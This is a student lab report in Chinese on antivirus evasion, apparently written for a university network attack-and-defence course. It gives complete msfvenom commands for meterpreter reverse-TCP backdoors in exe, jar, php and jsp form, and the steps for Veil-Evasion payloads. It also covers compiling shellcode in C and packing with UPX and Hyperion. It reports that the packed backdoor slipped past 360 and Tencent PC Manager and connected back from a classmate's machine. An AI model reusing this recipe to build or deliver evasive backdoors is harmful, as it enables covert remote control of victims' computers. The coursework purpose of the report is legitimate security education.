20165214 2018-2019-2 《網絡對抗技術》Exp3 免殺原理與實踐 Week5

《網絡對抗技術》Exp3 免殺原理與實踐 Week5

1、實驗內容

• 一、正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，加殼工具，使用shellcode編程；

• 二、經過組合應用各類技術實現惡意代碼免殺；

• 三、用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本；

2、實驗步驟

步驟一：正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，加殼工具，使用shellcode編程；

msf嘗試

• 一、在命令行輸入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=172.20.10.3 LPORT=5214 -f exe > 5214msf.exe，生成5214msf.exe。將5214msf.exe上傳到Virus Total進行檢測，檢測結果以下，有50個殺軟檢測出來了。
  

• 二、上面是隻進行一次編碼，接下來編碼十次：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=172.20.10.3 LPORT=5214 -f exe > 5214msf-10.exe。再把它上傳到VirusTotal，檢測結果以下：
  

能夠看到仍是有48個殺軟檢測出來了，編碼屢次和編碼一次的免殺效果差異不大。由於咱們使用的是一樣的模板，殺軟只要針對這個模板有所防備就好了，

使用msf生成其餘格式的文件（參考博客Metasploit之多種後門生成）

• 一、生成jar:msfvenom -p java/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 W >5214msf-java.jar，檢測結果：
  

• 二、生成php:msfvenom -p php/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 -f raw >5214msf-php.php，檢測結果：
  

• 三、生成jsp:msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.20.10.3 LPORT=5214 R >5214msf-jsp.jsp，檢測結果：
  

veil-evasion的嘗試

• 一、安裝Veil-Evasion。
  • 參考同窗的博客，先執行

  mkdir -p ~/.cache/wine
  cd ~/.cache/wine 
  wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
  wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

  • 安裝Veil-Evasion：sudo apt-get install veil-evasion
  • 輸入veil打開veil，第一次打開時須要進行安裝
    這應該是這個實驗最最最最花時間的部分了。。和各位同窗遇到的問題同樣，我也是各類卡，卡%16，%25，%91等等等等。可是我一直等了下去，等了四、5個小時，之間經歷了斷網重來，中間還又裝了和Python相關的三、4個軟件，使人絕望。後來終於下好了！輸入veil後出現界面：
    

• 二、打開veil後，先輸入use evasion進入evasion界面。
  

• 三、生成後門程序

  • 輸入use c/meterpreter/rev_tcp.py
    

  • 輸入set LHOST 172.20.10.3設置回連地址（這裏的IP地址是kali虛擬機的ip地址）
  • 輸入set LPORT 5214設置回連端口
  • 輸入generate生成文件

  • 最後輸入你想要給後門程序起的名字，這裏我輸入的是5214-veil。成功生成文件：
    
    文件默認在/var/lib/veil/output/compiled/5214-veil1.exe。

• 四、使用VirusTotal進行檢測，發現仍是有37個殺軟可以檢測出來：
  

使用shellcode編程

• 一、在命令行中輸入msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.20.10.3 LPORT=5214 -f c來生成C語言格式的ShellCode數組。
  

• 二、建立5214-shell.c建立.c文件，輸入下圖中的代碼，其中buf數組中的值就是上面生成的。
  

• 三、輸入i686-w64-mingw32-g++ 5214-shell.c -o 5214-shell.exe進行編譯。將獲得的5214-shell.exe先使用VirusTotal進行檢測，結果以下：
  

• 四、打開msfconsole，再在本機上打開5214-shell.exe，此時發現沒法鏈接（可是在下面加殼事後就能夠鏈接上了）

• 五、結合使用不一樣編碼器：msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=172.20.10.3 LPORT=5214 -f c
  

• 六、建立5214-shell-extend.c建立.c文件，輸入下圖中的代碼，其中buf數組中的值就是上面生成的（buf太長，省略一部分）。
  

• 七、輸入i686-w64-mingw32-g++ 5214-shell-extend.c -o 5214-shell-extend.exe進行編譯。將獲得的5214-shell-extend.exe先使用VirusTotal進行檢測，結果以下：
  

加殼工具

加殼是對相應的資源進行壓縮，壓縮後仍可運行。它能夠用來保護版權，但同時許多病毒也利用它來做爲原理。接下來將使用壓縮殼和保密殼來進行試驗。

• 一、壓縮殼（UPX）

  • 輸入upx 5214-shell.exe -o UPX5214-shell.exe進行加殼
    

  • 加殼後進行檢測，以下：
    

  • 嘗試進行回連，成功：
    

• 二、加密殼Hyperion

  • 考慮到下一步就是組合技術實現免殺，因此我就直接把加壓縮殼後的文件直接再加加密殼。

  • 將UPX5214-shell.exe複製到/usr/share/windows-binaries/hyperion/

  • 在目錄/usr/share/windows-binaries/hyperion/下輸入wine hyperion.exe -v UPX5214-shell.exe HyperionUPX5214-shell.exe再次進行加殼：
    

  • 進行免殺檢測：
    

  • 嘗試進行回連：
    

步驟二：經過組合應用各類技術實現惡意代碼免殺；

• 開啓360，把在步驟一中最終生成的hyUPX5214-shell.exe放到本機中，發現沒有被查殺：
  

步驟三：用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本；

• 把文件發到同窗的電腦上（裝有騰訊管家13.0.19837.233），沒有被殺掉。
  

• 在個人kali上打開msfconsole，而後在同窗的電腦上運行後門程序，成功連上
  

3、遇到的問題

• 一、在使用msf生成的shellcode編譯成文件來嘗試進行回連時失敗了，可是加殼後回連就成功了。如今尚未發現其緣由。

• 二、老師的指導書中一些說殺軟殺不出來的地方，結果殺軟都殺掉了。。。這是否是也說明了殺毒軟件也是在不停發展的？咱們實驗所用的處理軟件都是比較經常使用的，加上咱們的步驟都是比較簡單的，很容易成爲殺軟的識別對象。

4、基礎問題問答

• 一、殺軟是如何檢測出惡意代碼的？

• 答：基於特徵碼的檢測：簡單來講一段特徵碼就是一段或多段數據。若是一個可執行文件（或其餘運行的庫、腳本等）包含這樣的數據則被認爲是惡意代碼。
  啓發式惡意軟件檢測：對惡意軟件檢測來主說，就是若是一個軟件在幹一般是惡意軟件乾的事，看起來了像個惡意軟件，就把它當成一個惡意軟件進行檢查。典型的行爲如鏈接惡意網站、開放端口、修改系統文件，典型的「外觀」如文件自己簽名、結構、廠商等信息等。
  基於行爲的惡意軟件檢測：基於行爲的檢測至關因而啓發式的一種，或者是加入了行爲監控的啓發式

• 二、免殺是作什麼？

• 答：免殺就是讓安插的後門不被AV軟件發現

• 三、免殺的基本方法有哪些？
• 答：
• 改變特徵碼
  • 若是你手裏只有EXE
    • 加殼：壓縮殼 加密殼
  • 有shellcode(像Meterpreter）
    • 用encode進行編碼
    • 基於payload從新編譯生成可執行文件
  • 有源代碼
    • 用其餘語言進行重寫再編譯（veil-evasion）
• 改變行爲
  • 通信方式
    • 儘可能使用反彈式鏈接
    • 使用隧道技術
    • 加密通信數據
  • 操做模式
    • 基於內存操做
    • 減小對系統的修改
    • 加入混淆做用的正常功能代碼
• 四、開啓殺軟能絕對防止電腦中惡意代碼嗎？

• 答：從實驗中就能夠知道不能夠。

5、心得體會

此次實驗讓我知道了有不少殺毒軟件實際上是無論用的，一些簡單的操做就可以迷惑他們。可是，殺毒軟件也是不斷地在更新的，之前學長學姐們能夠正常存留下來的程序，我在作的時候就都被殺軟發現了。感受實驗仍是頗有趣的，畢竟和現實練習是很密切的。此次實驗讓我感覺到了免殺的強大力量，也讓我感覺到了本身的能力有限。從此應增強學習，不斷提升本身的網絡安全能力。